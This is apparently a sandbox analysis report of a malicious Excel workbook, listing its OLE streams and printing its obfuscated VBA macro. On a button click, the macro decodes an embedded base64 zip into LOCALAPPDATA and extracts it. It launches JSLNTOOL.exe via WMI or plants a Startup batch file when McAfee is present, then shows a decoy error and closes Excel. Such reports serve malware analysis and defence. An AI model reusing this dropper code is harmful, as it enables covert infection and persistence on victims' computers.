            Icon Hash:35ed8e920e8c81b5
            Document Type:OLE
            Number of OLE Files:1
            Has Summary Info:
            Application Name:Microsoft Excel
            Encrypted Document:False
            Contains Word Document Stream:False
            Contains Workbook/Book Stream:True
            Contains PowerPoint Document Stream:False
            Contains Visio Document Stream:False
            Contains ObjectPool Stream:False
            Flash Objects Count:0
            Contains VBA Macros:True
            Code Page:932
            Author:openpyxl
            Last Saved By:admin
            Create Time:2025-03-06 03:21:37
            Last Saved Time:2025-03-06 04:15:54
            Creating Application:Microsoft Excel
            Security:0
            Document Code Page:932
            Thumbnail Scaling Desired:False
            Contains Dirty Links:False
            Shared Document:False
            Changed Hyperlinks:False
            Application Version:1048576
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe
            VBA File Name:Mkidajqwe
            Stream Size:-1
            Data ASCII:
            Data Raw:
            Attribute VB_Name = "Mkidajqwe"
            Attribute VB_Base = "0{D3790334-D241-413C-A6B4-7B97CD9ED7EF}{249C2286-B847-4847-9AE3-E77BECF0F99A}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = False
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = False
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Mkidajqwe
            VBA File Name:Mkidajqwe
            Stream Size:1158
            Data ASCII:. . . . . . . . @ . . . . . . L . . . G . . . . . . . . . . . . . . u ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S < . . . . S < . . . . S . . . . . S . . . . . . . . . . . . 0 . { . D . 3 . 7 . 9 . 0 . 3 . 3 . 4 . - . D
            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 b9 75 60 bb 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "Mkidajqwe"
            Attribute VB_Base = "0{D3790334-D241-413C-A6B4-7B97CD9ED7EF}{249C2286-B847-4847-9AE3-E77BECF0F99A}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = False
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = False
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
            VBA File Name:Sheet1
            Stream Size:13155
            Data ASCII:. . . . . + . . . . . . . . . . c . . . > . . . X . . . & . . . . . . . . . . u l M . . c . . . . . . . . . . . . . . . . . H . . . . > k . O : . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . I A M . @ . y P . . . . . . . . . . . . . . . . . . . . . . x . . . . . ' . b t t t t t t t t , 1 , 0 , M S F o r m s , C o m m a n d B u t t o n . I A M . @ . y P . > k . O : . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S L . . . . S . . . . . S . . . . s
            Data Raw:01 16 01 00 03 2b 01 00 00 f7 0d 00 00 0f 01 00 00 63 02 00 00 3e 0e 00 00 58 0e 00 00 dc 26 00 00 00 00 00 00 01 00 00 00 b9 75 6c 4d 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 48 00 ff ff 00 00 ea 0f f0 3e d1 6b 06 4f b6 85 3a dc c8 b2 13 80 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "Sheet1"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            Attribute VB_Control = "btttttttt, 1, 0, MSForms, CommandButton"
            Public O000O1OO0110O1101 As String
            Private Sub btttttttt_Click()
            OO111OO0011010OO0
            O11O11O1OO0OO0101
            End Sub
            Sub OO111OO0011010OO0()
            Dim O1001O100O00OO111() As Byte
            O110OO1011010O1O0 = O01000OO001OOO00O(8)
            O0OO100000O01O01O = O01O1OO011OO1O101() + O110OO1011010O1O0 & "\"
            O0011OO00O1O0O1OO = O0OO100000O01O01O & O110OO1011010O1O0 & O0010O110111O1O01()
            MkDir (O0OO100000O01O01O)
            With CreateObject(O110O0OO1O00OO00O()).createElement(O111O11101O0O1001())
            .DataType = OO01010O111O100O0()
            .Text = Mkidajqwe.Nmdaskqwe1.Text & Mkidajqwe.Nmdaskqwe2.Text & Mkidajqwe.Nmdaskqwe3.Text
            O1001O100O00OO111 = .nodeTypedValue
            End With
            Open O0011OO00O1O0O1OO For Binary As #1: Put #1, , O1001O100O00OO111: Close #1
            Set O10O11O01OO10OO0O = CreateObject(OO1O10OO1O0101O11()): Set O100001O010OO0010 = O10O11O01OO10OO0O.Namespace(O0011OO00O1O0O1OO).items: O10O11O01OO10OO0O.Namespace(O0OO100000O01O01O).CopyHere (O100001O010OO0010):
            O000O1OO0110O1101 = O0OO100000O01O01O
            Kill O0011OO00O1O0O1OO
            End Sub
            Sub O11O11O1OO0OO0101()
            Dim fileNumber As Integer
            If Dir(O1110OO11O11OO0O1(), vbDirectory) = "" Then
            GetObject(OO1011O10O00O111O()).Get(OO110OO0110OOO1OO()).Create O1O1OO1O01101O0O0() + O000O1OO0110O1101 & OO00OO0O111O100O0(), Null, Null, 0
            Else
            Text = O10OOO001O0111101() & vbCrLf & O1O1OO1O01101O0O0() & O000O1OO0110O1101 & OO00OO0O111O100O0()
            fileNumber = FreeFile
            Open Environ(O000O110001OOOO11()) & O111OO111OO101101() For Output As fileNumber
            Print #fileNumber, Text
            Close fileNumber
            End If
            MsgBox "Expanding the file failed. Please open https://support.microsoft.com/en-us/office/how-to-get-support-for-outlook-com-f5482a98-616c-4d44-b7c5-8aaaadf5c11a View Help", vbCritical, O01101001O0011010()
            Application.Quit
            End Sub
            Function O01O1OO011OO1O101() As String
            O11111O1O1110OO1O = Environ(O1O1OO101O11O010O())
            O01O1OO011OO1O101 = Array(O11111O1O1110OO1O + O101O1010O01O0O0O(), O11111O1O1110OO1O + O11110OO11OO1O010())(Int(Rnd * 2))
            End Function
            Function O01000OO001OOO00O(length As Integer) As String:
            Randomize Timer: For i = 1 To length: O01000OO001OOO00O = O01000OO001OOO00O & Mid(OO1111O01OO101O01(), Int(36 * Rnd + 1), 1): Next i:
            End Function
            Function O110OO001OOO111O1() As String
            O110OO001OOO111O1 = Chr(196 - 162) + """"
            End Function
            Function O0010O110111O1O01() As String
            O0010O110111O1O01 = "." + "z" + "i" + "p"
            End Function
            Function O110O0OO1O00OO00O() As String
            O110O0OO1O00OO00O = "M" + "S" + "X" + "M" + Chr(196 - 120) + "2" + "." + "D" + "O" + "M" + "D" + "o" + "c" + "u" + "m" + "e" + Chr(258 - 148) + "t"
            End Function
            Function OO01010O111O100O0() As String
            OO01010O111O100O0 = "b" + "i" + "n" + "." + "b" + "a" + "s" + "e" + "6" + "4"
            End Function
            Function OO1O10OO1O0101O11() As String
            OO1O10OO1O0101O11 = "S" + "h" + "e" + "l" + "l" + "." + "A" + "p" + "p" + "l" + "i" + Chr(236 - 137) + Chr(295 - 198) + "t" + "i" + Chr(238 - 127) + "n"
            End Function
            Function OO00OO0O111O100O0() As String
            OO00OO0O111O100O0 = "J" + "S" + "L" + "N" + "T" + "O" + "O" + "L" + "." + Chr(258 - 157) + "x" + "e"
            End Function
            Function OO1011O10O00O111O() As String
            OO1011O10O00O111O = "w" + "i" + "n" + Chr(298 - 189) + "g" + Chr(267 - 158) + "t" + Chr(265 - 150) + ":" + Chr(257 - 134) + "i" + "m" + "p" + "e" + "r" + "s" + Chr(226 - 115) + "n" + "a" + "t" + "i" + "o" + "n" + "L" + "e" + "v" + "e" + "l" + "=" + "i" + "m" + "p" + "e" + "r" + Chr(274 - 159) + "o" + "n" + "a" + "t" + "e" + "}" + "!" + "\" + Chr(196 - 104) + "." + "\" + "r" + "o" + Chr(274 - 163) + "t" + Chr(238 - 146) + "c" + "i" + "m" + Chr(282 - 164) + "2"
            End Function
            Function O1110OO11O11OO0O1() As String
            O1110OO11O11OO0O1 = "C" + ":" + "\" + Chr(217 - 137) + "r" + "o" + "g" + "r" + "a" + "m" + " " + "F" + Chr(213 - 108) + "l" + "e" + "s" + "\" + "M" + "c" + Chr(298 - 233) + "f" + "e" + "e"
            End Function
            Function O1O1OO101O11O010O() As String
            O1O1OO101O11O010O = "L" + "O" + Chr(269 - 202) + "A" + "L" + "A" + "P" + "P" + "D" + "A" + "T" + Chr(242 - 177)
            End Function
            Function O000O110001OOOO11() As String
            O000O110001OOOO11 = Chr(292 - 227) + Chr(236 - 156) + "P" + "D" + "A" + "T" + Chr(255 - 190)
            End Function
            Function OO110OO0110OOO1OO() As String
            OO110OO0110OOO1OO = O111O11101O0O1001() + "i" + "n" + "3" + "2" + Chr(248 - 153) + "P" + Chr(273 - 159) + "o" + "c" + "e" + "s" + "s"
            End Function
            Function O11110OO11OO1O010() As String
            O11110OO11OO1O010 = "\" + "M" + "i" + "c" + "r" + "o" + "s" + "o" + "f" + "t" + "\" + O111O11101O0O1001() + "i" + "n" + "d" + "o" + "w" + "s" + "\"
            End Function
            Function O01101001O0011010() As String
            O01101001O0011010 = "E" + "r" + "r" + "o" + "r"
            End Function
            Function O0O1OO1O101O01101() As String
            O0O1OO1O101O01101 = "\" + "\"
            End Function
            Function O1O1OO1O01101O0O0() As String
            O1O1OO1O01101O0O0 = "e" + "x" + "p" + "l" + "o" + "r" + "e" + "r" + "." + "e" + "x" + "e" + " "
            End Function
            Function O101O1010O01O0O0O() As String
            O101O1010O01O0O0O = "\" + "M" + "i" + "c" + "r" + "o" + "s" + "o" + "f" + "t" + "\" + "M" + "e" + Chr(223 - 123) + "i" + "a" + " " + "P" + Chr(259 - 151) + "a" + Chr(296 - 175) + Chr(267 - 166) + "r" + "\" + "T" + "r" + Chr(213 - 116) + "n" + "s" + Chr(300 - 201) + "o" + Chr(217 - 117) + "e" + "d" + Chr(109 - 77) + "F" + "i" + "l" + "e" + "s" + " " + "C" + "a" + "c" + Chr(263 - 159) + "e" + "\"
            End Function
            Function O111OO111OO101101() As String
            O111OO111OO101101 = "\" + "M" + Chr(227 - 122) + Chr(236 - 137) + "r" + Chr(277 - 166) + "s" + "o" + "f" + Chr(282 - 166) + "\" + O111O11101O0O1001() + "i" + "n" + Chr(212 - 112) + Chr(276 - 165) + "w" + Chr(281 - 166) + "\" + "S" + Chr(263 - 147) + "a" + "r" + "t" + " " + "M" + "e" + "n" + "u" + "\" + "P" + Chr(284 - 170) + "o" + Chr(217 - 114) + "r" + "a" + Chr(298 - 189) + "s" + "\" + "S" + "t" + "a" + "r" + "t" + Chr(296 - 179) + Chr(227 - 115) + "\" + "E" + "x" + "p" + "l" + "o" + "r" + "e" + "r" + "." + "b" + Chr(282 - 185) + "t"
            End Function
            Function O111O11101O0O1001() As String
            O111O11101O0O1001 = "W"
            End Function
            Function O10OOO001O0111101() As String
            O10OOO001O0111101 = "@" + "e" + "c" + "h" + "o" + " " + "o" + "f" + Chr(208 - 106)
            End Function
            Function OO1111O01OO101O01() As String
            OO1111O01OO101O01 = "A" + "B" + "C" + "D" + "E" + Chr(241 - 171) + "G" + "H" + "I" + "J" + Chr(284 - 209) + "L" + "M" + "N" + "O" + "P" + "Q" + Chr(296 - 214) + "S" + "T" + "U" + "V" + "W" + "X" + "Y" + "Z" + "0" + "1" + "2" + "3" + Chr(137 - 85) + Chr(288 - 235) + "6" + "7" + "8" + "9"
            End Function
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
            VBA File Name:Sheet2
            Stream Size:977
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b9 75 d4 fd 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "Sheet2"
            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
            VBA File Name:ThisWorkbook
            Stream Size:985
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u " ( . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b9 75 22 28 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Attribute VB_Name = "ThisWorkbook"
            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
            Attribute VB_GlobalNameSpace = False
            Attribute VB_Creatable = False
            Attribute VB_PredeclaredId = True
            Attribute VB_Exposed = True
            Attribute VB_TemplateDerived = False
            Attribute VB_Customizable = True
            

            General
            Stream Path:\x1CompObj
            CLSID:
            File Type:data
            Stream Size:108
            Entropy:4.188499988527259
            Base64 Encoded:True
            Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:\x5DocumentSummaryInformation
            CLSID:
            File Type:data
            Stream Size:232
            Entropy:2.798395014391178
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ \\ . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 94 00 00 00 02 00 00 00 a4 03 00 00
            General
            Stream Path:\x5SummaryInformation
            CLSID:
            File Type:data
            Stream Size:212
            Entropy:3.536404846148865
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . \\ . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o p e n p y x l . . . . . . . . . . . . a d m i n . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . F . @ . . . . s N . . . . . . . . .
            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a4 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 6c 00 00 00 0c 00 00 00 84 00 00 00 0d 00 00 00 90 00 00 00 13 00 00 00 9c 00 00 00 02 00 00 00 a4 03 00 00 1e 00 00 00 0c 00 00 00
            General
            Stream Path:Ctls
            CLSID:
            File Type:data
            Stream Size:88
            Entropy:4.328638720860858
            Base64 Encoded:False
            Data ASCII:@ 2 . i . w . . . < W . . . . * . . . . . . . . . . s ` U . . . . . . . ( . . . . . . . . . . @ . . . . . . . . . . M i c r o s o f t Y a H e i .
            Data Raw:40 32 05 d7 69 ce cd 11 a7 77 00 dd 01 14 3c 57 00 02 18 00 2a 00 00 00 03 00 00 80 04 00 00 00 73 8a c5 60 fd 55 00 00 84 03 00 00 00 02 28 00 f7 00 00 00 0f 00 00 80 01 00 00 40 e1 00 00 00 00 02 03 00 bc 02 00 00 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 00
            General
            Stream Path:Workbook
            CLSID:
            File Type:Applesoft BASIC program data, first line number 16
            Stream Size:28442
            Entropy:4.8266028274261075
            Base64 Encoded:True
            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . a d m i n B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . x l 9 8 . . . . . . . X . @ . . . . . . . . . . " . .
            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 61 64 6d 69 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/\x1CompObj
            CLSID:
            File Type:data
            Stream Size:97
            Entropy:3.6106491830605214
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . 9 q . . . . . . . . . . . .
            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/\x3VBFrame
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:292
            Entropy:4.6423009411962335
            Base64 Encoded:True
            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } M k i d a j q w e . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 4d 6b 69 64 61 6a 71 77 65 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/f
            CLSID:
            File Type:data
            Stream Size:182
            Entropy:3.58067307433313
            Base64 Encoded:False
            Data ASCII:. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . e . . . . . . N m d a s k q w e 1 . . . . . . " . . . . . ( . . . . . . . . . . . D . . . . . . N m d a s k q w e 2 . . . . . . . . . . . ( . . . . . . . . . . . d . . . . . . N m d a s k q w e 3 . . { . . . . . . .
            Data Raw:00 04 20 00 08 0c 00 0c 03 00 00 00 06 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 88 00 00 00 00 83 01 00 00 00 28 00 e5 01 00 00 0a 00 00 80 01 00 00 00 d8 65 0d 00 00 00 17 00 4e 6d 64 61 73 6b 71 77 65 31 00 00 18 09 00 00 22 04 00 00 00 00 28 00 e5 01 00 00 0a 00 00 80 02 00 00 00 44 cb 13 00 01 00 17 00 4e 6d 64 61 73 6b 71 77 65 32
            General
            Stream Path:_VBA_PROJECT_CUR/Mkidajqwe/o
            CLSID:
            File Type:data
            Stream Size:3279488
            Entropy:6.000353718211798
            Base64 Encoded:False
            Data ASCII:. . . . . . @ . . . . . H , e . . . . { . . . U E s D B A o A A A A A A P N b Z l r u s k u z 9 F 0 G A P R d B g A I A A A A M 2 J i O D Y z O D l D S w O O M X b U i N D P j k b K n u Z 7 d 1 l 3 9 R Z 9 g o Q p X F 9 V m u Y V j a r 3 H S v K C b y q q j e O 1 D / l i 1 0 v Q N d r I e E t X M N F B H R 8 0 r 4 J G 7 G t K 6 / Q I r b g k t 4 o P D o I L u F f f U r D q c Q g d 3 n f r U h F J P P w I C L 7 K 0 5 n z u + w b i 3 P v E x 6 m V W o 7 + v f D j y 0 G v g X s N D u n B B K 1 7 V k g h 5 i k
            Data Raw:00 02 18 00 01 01 40 80 00 00 00 00 1b 48 80 2c 9d 65 0d 80 ec 09 00 00 7b 02 00 00 55 45 73 44 42 41 6f 41 41 41 41 41 41 50 4e 62 5a 6c 72 75 73 6b 75 7a 39 46 30 47 41 50 52 64 42 67 41 49 41 41 41 41 4d 32 4a 69 4f 44 59 7a 4f 44 6c 44 53 77 4f 4f 4d 58 62 55 69 4e 44 50 6a 6b 62 4b 6e 75 5a 37 64 31 6c 33 39 52 5a 39 67 6f 51 70 58 46 39 56 6d 75 59 56 6a 61 72 33 48 53 76 4b
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECT
            CLSID:
            File Type:ASCII text, with CRLF line terminators
            Stream Size:665
            Entropy:5.238643805025801
            Base64 Encoded:True
            Data ASCII:I D = " { B 9 8 4 0 5 C 1 - 3 2 6 1 - 4 F D 6 - B 2 0 B - F B 0 E 1 8 5 3 0 9 B E } " . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = M k i d a j q w e . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i
            Data Raw:49 44 3d 22 7b 42 39 38 34 30 35 43 31 2d 33 32 36 31 2d 34 46 44 36 2d 42 32 30 42 2d 46 42 30 45 31 38 35 33 30 39 42 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
            General
            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
            CLSID:
            File Type:data
            Stream Size:113
            Entropy:3.3616454934709092
            Base64 Encoded:False
            Data ASCII:S h e e t 1 . S . h . e . e . t . 1 . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 2 . S . h . e . e . t . 2 . . . M k i d a j q w e . M . k . i . d . a . j . q . w . e . . . . .
            Data Raw:53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 4d 6b 69 64 61 6a 71 77 65 00 4d 00 6b 00 69 00 64 00 61 00 6a 00 71 00 77 00 65 00 00 00 00 00
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
            CLSID:
            File Type:data
            Stream Size:4460
            Entropy:4.6371480224979935
            Base64 Encoded:False
            Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ .
            Data Raw:cc 61 b2 00 00 01 00 ff 11 04 00 00 09 04 00 00 a4 03 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
            CLSID:
            File Type:data
            Stream Size:2480
            Entropy:4.361030430281233
            Base64 Encoded:False
            Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 I H # @ r 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . Q . . . . . . . . . . . . .
